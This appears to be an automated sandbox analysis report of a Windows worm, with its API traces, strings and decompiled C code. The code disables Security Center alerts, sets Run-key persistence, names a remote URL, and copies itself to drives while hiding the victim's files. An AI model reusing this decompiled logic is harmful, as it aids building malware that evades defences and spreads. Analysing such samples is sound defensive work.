                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00406692
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Security Center\Svc,00000000,00020006,00000000), ref: 004066B0
                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallOverride,00000000,00000004,00000001,00000004), ref: 004066D7
                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallDisableNotify,00000000,00000004,00000001,00000004), ref: 004066F6
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiSpywareOverride,00000000,00000004,00000001,00000004), ref: 00406715
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusOverride,00000000,00000004,00000001,00000004), ref: 00406734
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusDisableNotify,00000000,00000004,00000001,00000004), ref: 00406753
                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesOverride,00000000,00000004,00000001,00000004), ref: 00406772
                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesDisableNotify,00000000,00000004,00000001,00000004), ref: 00406791
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040679E
                                                                                  • Sleep.KERNEL32(000001F4), ref: 004067A9
                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 004067CB
                                                                                  • wsprintfW.USER32 ref: 004067E2
                                                                                  • wsprintfW.USER32 ref: 004067FC
                                                                                  • CreateThread.KERNEL32 ref: 00406814
                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040681F
                                                                                  • CreateThread.KERNEL32 ref: 00406834
                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040683F
                                                                                  • CreateThread.KERNEL32 ref: 00406854
                                                                                  • Sleep.KERNEL32(00002710), ref: 0040685F
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040687C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$Delete$Sleep$Move$Value$Internet$Window$CloseOpen$FindHandle$Createwsprintf$ExitProcess$ForegroundShowThread$AttributesCopyEnvironmentExpandNamePathStrings$ErrorEventExistsLastModuleMutexStartup
                                                                                  • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\tncmds.dat$%s\tnnodes.dat$%userprofile%$%windir%$(#$,$2#$2dgd828d8g8fg8g8g$4yy4w4yw4fwgwgw$579795729858927452784$7$984658$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$C:\Users\user\Desktop\Id4zlrsrZ4.exe$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$aefafugaugfgauegf$aefyaiegfayegfg$argarhargafafargh$argarhrharharfafrahth$feu8gf8g2gf8g2fg$ffag8f2g8fg82g8f8g8fg$http://2462462645.fr/$ttyu8ruy8uy8u8yu$winrecsv.exe
                                                                                  • API String ID: 1472887078-911532292
                                                                                  • Opcode ID: d3d9f545dab84f0d5262fc2406b66f377c68c0d8d20069a12fc3b629659c4998
                                                                                  • Instruction ID: 5381a988ab4d71a95ab7e29ec0f43e912bf8196cdff92c6a99a63db8bd3eacf6
                                                                                  • Opcode Fuzzy Hash: d3d9f545dab84f0d5262fc2406b66f377c68c0d8d20069a12fc3b629659c4998
                                                                                  • Instruction Fuzzy Hash: 5472EF71680314ABD7209F90AC4AFD97B74BB48B06F2085A5F709B61D0DAF85AC4CF5D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 104 40d740-40d79e memset CreateProcessW 105 40d7a0-40d7ad Sleep 104->105 106 40d7af-40d7d3 ShellExecuteW 104->106 109 40d7e6-40d7e9 105->109 107 40d7e4 106->107 108 40d7d5-40d7e2 Sleep 106->108 107->109 108->109
                                                                                  C-Code - Quality: 100%
                                                                                  			E0040D740(char _a4) {
                                                                                  				void* _v8;
                                                                                  				struct _PROCESS_INFORMATION _v24;
                                                                                  				struct _STARTUPINFOW _v100;
                                                                                  				intOrPtr _v104;
                                                                                  				int _t20;
                                                                                  
                                                                                  				memset( &_v100, 0, 0x44);
                                                                                  				_v24.hProcess = 0;
                                                                                  				_v24.hThread = 0;
                                                                                  				_v24.dwProcessId = 0;
                                                                                  				_v24.dwThreadId = 0;
                                                                                  				_v100.cb = 0x44;
                                                                                  				_v100.dwFlags = 1;
                                                                                  				_v100.wShowWindow = 5;
                                                                                  				_t11 =  &_a4; // 0x40656e
                                                                                  				_t20 = CreateProcessW(0,  *_t11, 0, 0, 0, 0x20, 0, 0,  &_v100,  &_v24); // executed
                                                                                  				if(_t20 != 1) {
                                                                                  					_t12 =  &_a4; // 0x40656e
                                                                                  					_v8 = ShellExecuteW(0, L"open",  *_t12, 0, 0, 0);
                                                                                  					_v104 = _v8;
                                                                                  					if(_v104 <= 0x20) {
                                                                                  						return 0;
                                                                                  					}
                                                                                  					Sleep(0x3e8);
                                                                                  					return 1;
                                                                                  				}
                                                                                  				Sleep(0x3e8); // executed
                                                                                  				return 1;
                                                                                  			}








                                                                                  0x0040d74e
                                                                                  0x0040d758
                                                                                  0x0040d75b
                                                                                  0x0040d75e
                                                                                  0x0040d761
                                                                                  0x0040d764
                                                                                  0x0040d76b
                                                                                  0x0040d777
                                                                                  0x0040d78f
                                                                                  0x0040d795
                                                                                  0x0040d79e
                                                                                  0x0040d7b5
                                                                                  0x0040d7c6
                                                                                  0x0040d7cc
                                                                                  0x0040d7d3
                                                                                  0x00000000
                                                                                  0x0040d7e4
                                                                                  0x0040d7da
                                                                                  0x00000000
                                                                                  0x0040d7e0
                                                                                  0x0040d7a5
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • memset.NTDLL ref: 0040D74E
                                                                                  • CreateProcessW.KERNELBASE ref: 0040D795
                                                                                  • Sleep.KERNELBASE(000003E8), ref: 0040D7A5
                                                                                  • ShellExecuteW.SHELL32(00000000,open,ne@,00000000,00000000,00000000), ref: 0040D7C0
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D7DA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep$CreateExecuteProcessShellmemset
                                                                                  • String ID: $D$ne@$open
                                                                                  • API String ID: 2222793131-3207568236
                                                                                  • Opcode ID: 5f6903af65bfe535200d81666b806fcc276bdec7bf2871f08574f27a7109b4d3
                                                                                  • Instruction ID: 933796f3933de1520c7fb78abd268757ff0d70a2e837ae2d9ddd379650c1acbf
                                                                                  • Opcode Fuzzy Hash: 5f6903af65bfe535200d81666b806fcc276bdec7bf2871f08574f27a7109b4d3
                                                                                  • Instruction Fuzzy Hash: 05110071E84308BBEB14DFD4DD46BDE7774AB18700F20412AF609BB2C0D7B55A448B59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 121 404bd0-404be5 _chkstk 122 404be7-404be9 121->122 123 404bee-404ca0 wsprintfW * 5 PathFileExistsW 121->123 126 4050a5-4050a8 122->126 124 404ca2-404cc3 call 40d530 123->124 125 404ce4-404cf3 PathFileExistsW 123->125 124->125 135 404cc5-404cde SetFileAttributesW DeleteFileW 124->135 128 404d60-404d6f PathFileExistsW 125->128 129 404cf5-404d04 PathFileExistsW 125->129 133 404d71-404d77 128->133 134 404db6-404dd7 FindFirstFileW 128->134 131 404d06-404d17 CreateDirectoryW 129->131 132 404d28-404d37 PathFileExistsW 129->132 131->132 138 404d19-404d22 SetFileAttributesW 131->138 132->128 139 404d39-404d4f CopyFileW 132->139 140 404d91-404da4 call 404980 133->140 141 404d79-404d8f call 404980 133->141 136 404ddd-404e95 134->136 137 40509f 134->137 135->125 143 404e9f-404eb3 lstrcmpW 136->143 137->126 138->132 139->128 144 404d51-404d5a SetFileAttributesW 139->144 150 404da7-404db0 SetFileAttributesW 140->150 141->150 147 404eb5-404ec9 lstrcmpW 143->147 148 404ecb 143->148 144->128 147->148 151 404ed0-404ee1 147->151 152 405076-40508c FindNextFileW 148->152 150->134 153 404ef2-404ef9 151->153 154 404ee3-404eec 151->154 152->143 155 405092-405099 FindClose 152->155 156 404f27-404f30 153->156 157 404efb-404f18 lstrcmpiW 153->157 154->153 155->137 160 404f32 156->160 161 404f37-404f48 156->161 158 404f1a 157->158 159 404f1c-404f23 157->159 158->154 159->156 160->152 162 404f59-404f60 161->162 163 404f4a-404f53 161->163 164 404fd0-404fd9 162->164 165 404f62-404f7f PathMatchSpecW 162->165 163->162 166 404fe0-404fef PathFileExistsW 164->166 167 404fdb 164->167 168 404f81 165->168 169 404f83-404fc9 wsprintfW SetFileAttributesW DeleteFileW 165->169 170 404ff1 166->170 171 404ff6-405046 wsprintfW * 2 166->171 167->152 168->163 169->164 170->152 172 405060-405070 MoveFileExW 171->172 173 405048-40505e call 404a90 171->173 172->152 173->152
                                                                                  C-Code - Quality: 100%
                                                                                  			E00404BD0(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16) {
                                                                                  				short _v524;
                                                                                  				short _v1044;
                                                                                  				short _v1564;
                                                                                  				short _v2084;
                                                                                  				intOrPtr _v2088;
                                                                                  				short _v2612;
                                                                                  				short _v3132;
                                                                                  				char _v3133;
                                                                                  				struct _WIN32_FIND_DATAW _v3732;
                                                                                  				short _v4252;
                                                                                  				void* _v4256;
                                                                                  				short _v4780;
                                                                                  				intOrPtr _v4784;
                                                                                  				WCHAR* _v4788;
                                                                                  				WCHAR* _v4792;
                                                                                  				WCHAR* _v4796;
                                                                                  				WCHAR* _v4800;
                                                                                  				WCHAR* _v4804;
                                                                                  				intOrPtr _v4808;
                                                                                  				WCHAR* _v4812;
                                                                                  				WCHAR* _v4816;
                                                                                  				WCHAR* _v4820;
                                                                                  				WCHAR* _v4824;
                                                                                  				WCHAR* _v4828;
                                                                                  				WCHAR* _v4832;
                                                                                  				WCHAR* _v4836;
                                                                                  				WCHAR* _v4840;
                                                                                  				WCHAR* _v4844;
                                                                                  				WCHAR* _v4848;
                                                                                  				WCHAR* _v4852;
                                                                                  				WCHAR* _v4856;
                                                                                  				WCHAR* _v4860;
                                                                                  				signed char _v4861;
                                                                                  				signed char _v4862;
                                                                                  				signed int _v4868;
                                                                                  				signed int _v4872;
                                                                                  				intOrPtr _t167;
                                                                                  				intOrPtr _t195;
                                                                                  				void* _t218;
                                                                                  				void* _t219;
                                                                                  				void* _t224;
                                                                                  
                                                                                  				L0040F1AA();
                                                                                  				if((_a12 & 0x00080000) != 0) {
                                                                                  					return 0;
                                                                                  				}
                                                                                  				_v2088 = 0x4140cc;
                                                                                  				_v3133 = 0;
                                                                                  				wsprintfW( &_v1564, L"%s.lnk", _a8);
                                                                                  				wsprintfW( &_v4252, L"%s\\%s", _a4, _v2088);
                                                                                  				wsprintfW( &_v4780, L"%s\\%s\\VolDriver.exe", _a4, _v2088);
                                                                                  				wsprintfW( &_v2612, L"%s\\%s", _a4,  &_v1564);
                                                                                  				wsprintfW( &_v1044, L"%s\\*", _a4);
                                                                                  				_t224 = _t219 + 0x48;
                                                                                  				if(PathFileExistsW( &_v4780) != 0) {
                                                                                  					_t167 = E0040D530( &_v4780);
                                                                                  					_t224 = _t224 + 4;
                                                                                  					_v4784 = _t167;
                                                                                  					_t195 =  *0x414410; // 0x0
                                                                                  					if(_t195 != _v4784) {
                                                                                  						SetFileAttributesW( &_v4780, 0x80);
                                                                                  						DeleteFileW( &_v4780);
                                                                                  					}
                                                                                  				}
                                                                                  				if(PathFileExistsW( &_v4780) == 0) {
                                                                                  					if(PathFileExistsW( &_v4252) == 0 && CreateDirectoryW( &_v4252, 0) != 0) {
                                                                                  						SetFileAttributesW( &_v4252, 2);
                                                                                  					}
                                                                                  					if(PathFileExistsW( &_v4252) != 0 && CopyFileW(0x414418,  &_v4780, 0) != 0) {
                                                                                  						SetFileAttributesW( &_v4780, 2);
                                                                                  					}
                                                                                  				}
                                                                                  				if(PathFileExistsW( &_v2612) == 0) {
                                                                                  					if((_a16 & 0x000000ff) == 0) {
                                                                                  						E00404980( &_v2612, L"shell32.dll", 8);
                                                                                  						_t224 = _t224 + 0xc;
                                                                                  					} else {
                                                                                  						E00404980( &_v2612, L"shell32.dll", 9);
                                                                                  						_t224 = _t224 + 0xc;
                                                                                  					}
                                                                                  					SetFileAttributesW( &_v2612, 1);
                                                                                  				}
                                                                                  				_v4256 = FindFirstFileW( &_v1044,  &_v3732);
                                                                                  				if(_v4256 == 0xffffffff) {
                                                                                  					L45:
                                                                                  					return _v3133;
                                                                                  				} else {
                                                                                  					_v4860 = L"*.lnk";
                                                                                  					_v4856 = L"*.vbs";
                                                                                  					_v4852 = L"*.js";
                                                                                  					_v4848 = L"*.scr";
                                                                                  					_v4844 = L"*.com";
                                                                                  					_v4840 = L"*.jse";
                                                                                  					_v4836 = L"*.cmd";
                                                                                  					_v4832 = L"*.pif";
                                                                                  					_v4828 = L"*.jar";
                                                                                  					_v4824 = L"*.dll";
                                                                                  					_v4820 = L"*.vbe";
                                                                                  					_v4816 = L"*.bat";
                                                                                  					_v4812 = L"*.inf";
                                                                                  					_v4808 = _v2088;
                                                                                  					_v4804 =  &_v1564;
                                                                                  					_v4800 = L"Thumbs.db";
                                                                                  					_v4796 = L"$RECYCLE.BIN";
                                                                                  					_v4792 = L"desktop.ini";
                                                                                  					_v4788 = L"System Volume Information";
                                                                                  					do {
                                                                                  						if(lstrcmpW( &(_v3732.cFileName), ".") != 0 && lstrcmpW( &(_v3732.cFileName), L"..") != 0) {
                                                                                  							_v4862 = 0;
                                                                                  							_v4868 = 0;
                                                                                  							while(_v4868 < 6) {
                                                                                  								if(lstrcmpiW( &(_v3732.cFileName),  *(_t218 + _v4868 * 4 - 0x12c4)) == 0) {
                                                                                  									_v4862 = 1;
                                                                                  									break;
                                                                                  								}
                                                                                  								_v4868 = _v4868 + 1;
                                                                                  							}
                                                                                  							if((_v4862 & 0x000000ff) == 0) {
                                                                                  								_v4861 = 0;
                                                                                  								_v4872 = 0;
                                                                                  								while(_v4872 < 0xd) {
                                                                                  									if(PathMatchSpecW( &(_v3732.cFileName),  *(_t218 + _v4872 * 4 - 0x12f8)) != 0) {
                                                                                  										wsprintfW( &_v2084, L"%s\\%s", _a4,  &(_v3732.cFileName));
                                                                                  										_t224 = _t224 + 0x10;
                                                                                  										SetFileAttributesW( &_v2084, 0x80);
                                                                                  										DeleteFileW( &_v2084);
                                                                                  										_v4861 = 1;
                                                                                  										break;
                                                                                  									}
                                                                                  									_v4872 = _v4872 + 1;
                                                                                  								}
                                                                                  								if((_v4861 & 0x000000ff) == 0) {
                                                                                  									if(PathFileExistsW( &_v4252) != 0) {
                                                                                  										wsprintfW( &_v3132, L"%s\\%s", _a4,  &(_v3732.cFileName));
                                                                                  										wsprintfW( &_v524, L"%s\\%s\\%s", _a4, _v2088,  &(_v3732.cFileName));
                                                                                  										_t224 = _t224 + 0x24;
                                                                                  										if((_v3732.dwFileAttributes & 0x00000010) == 0) {
                                                                                  											MoveFileExW( &_v3132,  &_v524, 9);
                                                                                  										} else {
                                                                                  											E00404A90( &_v3132,  &_v524);
                                                                                  											_t224 = _t224 + 8;
                                                                                  										}
                                                                                  									}
                                                                                  								}
                                                                                  								goto L43;
                                                                                  							}
                                                                                  						}
                                                                                  						L43:
                                                                                  					} while (FindNextFileW(_v4256,  &_v3732) != 0);
                                                                                  					FindClose(_v4256);
                                                                                  					goto L45;
                                                                                  				}
                                                                                  			}












































                                                                                  0x00404bd8
                                                                                  0x00404be5
                                                                                  0x00000000
                                                                                  0x00404be7
                                                                                  0x00404bee
                                                                                  0x00404bf8
                                                                                  0x00404c0f
                                                                                  0x00404c2f
                                                                                  0x00404c4f
                                                                                  0x00404c6f
                                                                                  0x00404c88
                                                                                  0x00404c8e
                                                                                  0x00404ca0
                                                                                  0x00404ca9
                                                                                  0x00404cae
                                                                                  0x00404cb1
                                                                                  0x00404cb7
                                                                                  0x00404cc3
                                                                                  0x00404cd1
                                                                                  0x00404cde
                                                                                  0x00404cde
                                                                                  0x00404cc3
                                                                                  0x00404cf3
                                                                                  0x00404d04
                                                                                  0x00404d22
                                                                                  0x00404d22
                                                                                  0x00404d37
                                                                                  0x00404d5a
                                                                                  0x00404d5a
                                                                                  0x00404d37
                                                                                  0x00404d6f
                                                                                  0x00404d77
                                                                                  0x00404d9f
                                                                                  0x00404da4
                                                                                  0x00404d79
                                                                                  0x00404d87
                                                                                  0x00404d8c
                                                                                  0x00404d8c
                                                                                  0x00404db0
                                                                                  0x00404db0
                                                                                  0x00404dca
                                                                                  0x00404dd7
                                                                                  0x0040509f
                                                                                  0x00000000
                                                                                  0x00404ddd
                                                                                  0x00404ddd
                                                                                  0x00404de7
                                                                                  0x00404df1
                                                                                  0x00404dfb
                                                                                  0x00404e05
                                                                                  0x00404e0f
                                                                                  0x00404e19
                                                                                  0x00404e23
                                                                                  0x00404e2d
                                                                                  0x00404e37
                                                                                  0x00404e41
                                                                                  0x00404e4b
                                                                                  0x00404e55
                                                                                  0x00404e65
                                                                                  0x00404e71
                                                                                  0x00404e77
                                                                                  0x00404e81
                                                                                  0x00404e8b
                                                                                  0x00404e95
                                                                                  0x00404e9f
                                                                                  0x00404eb3
                                                                                  0x00404ed0
                                                                                  0x00404ed7
                                                                                  0x00404ef2
                                                                                  0x00404f18
                                                                                  0x00404f1c
                                                                                  0x00000000
                                                                                  0x00404f1c
                                                                                  0x00404eec
                                                                                  0x00404eec
                                                                                  0x00404f30
                                                                                  0x00404f37
                                                                                  0x00404f3e
                                                                                  0x00404f59
                                                                                  0x00404f7f
                                                                                  0x00404f9a
                                                                                  0x00404fa0
                                                                                  0x00404faf
                                                                                  0x00404fbc
                                                                                  0x00404fc2
                                                                                  0x00000000
                                                                                  0x00404fc2
                                                                                  0x00404f53
                                                                                  0x00404f53
                                                                                  0x00404fd9
                                                                                  0x00404fef
                                                                                  0x0040500d
                                                                                  0x00405034
                                                                                  0x0040503a
                                                                                  0x00405046
                                                                                  0x00405070
                                                                                  0x00405048
                                                                                  0x00405056
                                                                                  0x0040505b
                                                                                  0x0040505b
                                                                                  0x00405046
                                                                                  0x00404fef
                                                                                  0x00000000
                                                                                  0x00404fd9
                                                                                  0x00404f32
                                                                                  0x00405076
                                                                                  0x0040508a
                                                                                  0x00405099
                                                                                  0x00000000
                                                                                  0x00405099

                                                                                  APIs
                                                                                  • _chkstk.NTDLL(?,00405220,?,?,?), ref: 00404BD8
                                                                                  • wsprintfW.USER32 ref: 00404C0F
                                                                                  • wsprintfW.USER32 ref: 00404C2F
                                                                                  • wsprintfW.USER32 ref: 00404C4F
                                                                                  • wsprintfW.USER32 ref: 00404C6F
                                                                                  • wsprintfW.USER32 ref: 00404C88
                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404C98
                                                                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 00404CD1
                                                                                  • DeleteFileW.KERNEL32(?), ref: 00404CDE
                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404CEB
                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404CFC
                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00404D0F
                                                                                  • SetFileAttributesW.KERNEL32(?,00000002), ref: 00404D22
                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404D2F
                                                                                  • CopyFileW.KERNEL32(00414418,?,00000000), ref: 00404D47
                                                                                  • SetFileAttributesW.KERNEL32(?,00000002), ref: 00404D5A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$wsprintf$ExistsPath$Attributes$CopyCreateDeleteDirectory_chkstk
                                                                                  • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolDriver.exe$%s\*$shell32.dll$shell32.dll
                                                                                  • API String ID: 3833403615-1812021906
                                                                                  • Opcode ID: 62579ddd412223121d61bd6eea2e6a24c3e94b8aea53340661bac94d9f0a3f90
                                                                                  • Instruction ID: 56dfbe622999f3f4d946997a069b2a92ca57c1f224be27ae97978ead2f5811f9
                                                                                  • Opcode Fuzzy Hash: 62579ddd412223121d61bd6eea2e6a24c3e94b8aea53340661bac94d9f0a3f90
                                                                                  • Instruction Fuzzy Hash: BBD170B4900219AFCB20DF60DC44BEA77B8BF44304F0485E9F609A6290D7B99BD4CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 100%
                                                                                  			E00406950(intOrPtr _a4, signed int _a8) {
                                                                                  				signed int _v8;
                                                                                  				signed int _v12;
                                                                                  				signed int _v16;
                                                                                  				signed int _v24;
                                                                                  				signed int _v28;
                                                                                  				intOrPtr _v32;
                                                                                  				signed int _t1394;
                                                                                  				signed int _t1396;
                                                                                  				signed int _t1397;
                                                                                  				signed int _t1398;
                                                                                  				signed int _t1399;
                                                                                  				signed int _t1403;
                                                                                  				signed int _t1413;
                                                                                  				intOrPtr _t1414;
                                                                                  				signed int _t1424;
                                                                                  				intOrPtr _t1425;
                                                                                  				signed int _t1435;
                                                                                  				intOrPtr _t1436;
                                                                                  				signed int _t1446;
                                                                                  				intOrPtr _t1447;
                                                                                  				signed int _t1457;
                                                                                  				intOrPtr _t1458;
                                                                                  				signed int _t1468;
                                                                                  				intOrPtr _t1469;
                                                                                  				signed int _t1479;
                                                                                  				intOrPtr _t1480;
                                                                                  				signed int _t1490;
                                                                                  				intOrPtr _t1491;
                                                                                  				signed int _t1501;
                                                                                  				intOrPtr _t1502;
                                                                                  				signed int _t1512;
                                                                                  				intOrPtr _t1513;
                                                                                  				signed int _t1523;
                                                                                  				intOrPtr _t1524;
                                                                                  				signed int _t1534;
                                                                                  				intOrPtr _t1535;
                                                                                  				signed int _t1545;
                                                                                  				intOrPtr _t1546;
                                                                                  				signed int _t1556;
                                                                                  				intOrPtr _t1557;
                                                                                  				signed int _t1567;
                                                                                  				intOrPtr _t1568;
                                                                                  				signed int _t1577;
                                                                                  				intOrPtr _t1579;
                                                                                  				intOrPtr _t1580;
                                                                                  				intOrPtr _t1581;
                                                                                  				signed int _t1582;
                                                                                  				signed int _t1588;
                                                                                  				signed int _t1589;
                                                                                  				signed int _t1590;
                                                                                  				signed int _t1591;
                                                                                  				signed int _t1595;
                                                                                  				signed int _t1598;
                                                                                  				signed int _t1599;
                                                                                  				signed int _t1600;
                                                                                  				signed int _t1601;
                                                                                  				signed int _t1605;
                                                                                  				signed int _t1608;
                                                                                  				signed int _t1609;
                                                                                  				signed int _t1610;
                                                                                  				signed int _t1611;
                                                                                  				signed int _t1615;
                                                                                  				signed int _t1618;
                                                                                  				signed int _t1619;
                                                                                  				signed int _t1620;
                                                                                  				signed int _t1621;
                                                                                  				signed int _t1625;
                                                                                  				signed int _t1628;
                                                                                  				signed int _t1629;
                                                                                  				signed int _t1630;
                                                                                  				signed int _t1631;
                                                                                  				signed int _t1635;
                                                                                  				signed int _t1638;
                                                                                  				signed int _t1639;
                                                                                  				signed int _t1640;
                                                                                  				signed int _t1641;
                                                                                  				signed int _t1645;
                                                                                  				signed int _t1648;
                                                                                  				signed int _t1649;
                                                                                  				signed int _t1650;
                                                                                  				signed int _t1651;
                                                                                  				signed int _t1655;
                                                                                  				signed int _t1658;
                                                                                  				signed int _t1659;
                                                                                  				signed int _t1660;
                                                                                  				signed int _t1661;
                                                                                  				signed int _t1665;
                                                                                  				signed int _t1668;
                                                                                  				signed int _t1669;
                                                                                  				signed int _t1670;
                                                                                  				signed int _t1671;
                                                                                  				signed int _t1675;
                                                                                  				signed int _t1678;
                                                                                  				signed int _t1679;
                                                                                  				signed int _t1680;
                                                                                  				signed int _t1681;
                                                                                  				signed int _t1685;
                                                                                  				signed int _t1688;
                                                                                  				signed int _t1689;
                                                                                  				signed int _t1690;
                                                                                  				signed int _t1691;
                                                                                  				signed int _t1695;
                                                                                  				signed int _t1698;
                                                                                  				signed int _t1699;
                                                                                  				signed int _t1700;
                                                                                  				signed int _t1701;
                                                                                  				signed int _t1705;
                                                                                  				signed int _t1708;
                                                                                  				signed int _t1709;
                                                                                  				signed int _t1710;
                                                                                  				signed int _t1711;
                                                                                  				signed int _t1715;
                                                                                  				signed int _t1718;
                                                                                  				signed int _t1719;
                                                                                  				signed int _t1720;
                                                                                  				signed int _t1721;
                                                                                  				signed int _t1725;
                                                                                  				signed int _t1728;
                                                                                  				signed int _t1729;
                                                                                  				signed int _t1730;
                                                                                  				signed int _t1731;
                                                                                  				signed int _t1735;
                                                                                  				signed int _t1738;
                                                                                  				signed int _t1748;
                                                                                  				intOrPtr _t1749;
                                                                                  				intOrPtr _t1755;
                                                                                  				intOrPtr _t1756;
                                                                                  				intOrPtr _t1757;
                                                                                  				signed int _t1758;
                                                                                  				intOrPtr _t1767;
                                                                                  				intOrPtr _t1768;
                                                                                  				intOrPtr _t1769;
                                                                                  				signed int _t1770;
                                                                                  				intOrPtr _t1779;
                                                                                  				intOrPtr _t1780;
                                                                                  				intOrPtr _t1781;
                                                                                  				signed int _t1782;
                                                                                  				intOrPtr _t1791;
                                                                                  				intOrPtr _t1792;
                                                                                  				intOrPtr _t1793;
                                                                                  				signed int _t1794;
                                                                                  				intOrPtr _t1803;
                                                                                  				intOrPtr _t1804;
                                                                                  				intOrPtr _t1805;
                                                                                  				signed int _t1806;
                                                                                  				intOrPtr _t1815;
                                                                                  				intOrPtr _t1816;
                                                                                  				intOrPtr _t1817;
                                                                                  				signed int _t1818;
                                                                                  				intOrPtr _t1827;
                                                                                  				intOrPtr _t1828;
                                                                                  				intOrPtr _t1829;
                                                                                  				signed int _t1830;
                                                                                  				intOrPtr _t1839;
                                                                                  				intOrPtr _t1840;
                                                                                  				intOrPtr _t1841;
                                                                                  				signed int _t1842;
                                                                                  				intOrPtr _t1851;
                                                                                  				intOrPtr _t1852;
                                                                                  				intOrPtr _t1853;
                                                                                  				signed int _t1854;
                                                                                  				intOrPtr _t1863;
                                                                                  				intOrPtr _t1864;
                                                                                  				intOrPtr _t1865;
                                                                                  				signed int _t1866;
                                                                                  				intOrPtr _t1875;
                                                                                  				intOrPtr _t1876;
                                                                                  				intOrPtr _t1877;
                                                                                  				signed int _t1878;
                                                                                  				intOrPtr _t1887;
                                                                                  				intOrPtr _t1888;
                                                                                  				intOrPtr _t1889;
                                                                                  				signed int _t1890;
                                                                                  				intOrPtr _t1899;
                                                                                  				intOrPtr _t1900;
                                                                                  				intOrPtr _t1901;
                                                                                  				signed int _t1902;
                                                                                  				intOrPtr _t1911;
                                                                                  				intOrPtr _t1912;
                                                                                  				intOrPtr _t1913;
                                                                                  				signed int _t1914;
                                                                                  				intOrPtr _t1923;
                                                                                  				intOrPtr _t1924;
                                                                                  				intOrPtr _t1925;
                                                                                  				signed int _t1926;
                                                                                  				intOrPtr _t2043;
                                                                                  				intOrPtr _t2044;
                                                                                  				intOrPtr _t2045;
                                                                                  				intOrPtr _t2050;
                                                                                  				intOrPtr _t2051;
                                                                                  				intOrPtr _t2052;
                                                                                  				intOrPtr _t2057;
                                                                                  				intOrPtr _t2058;
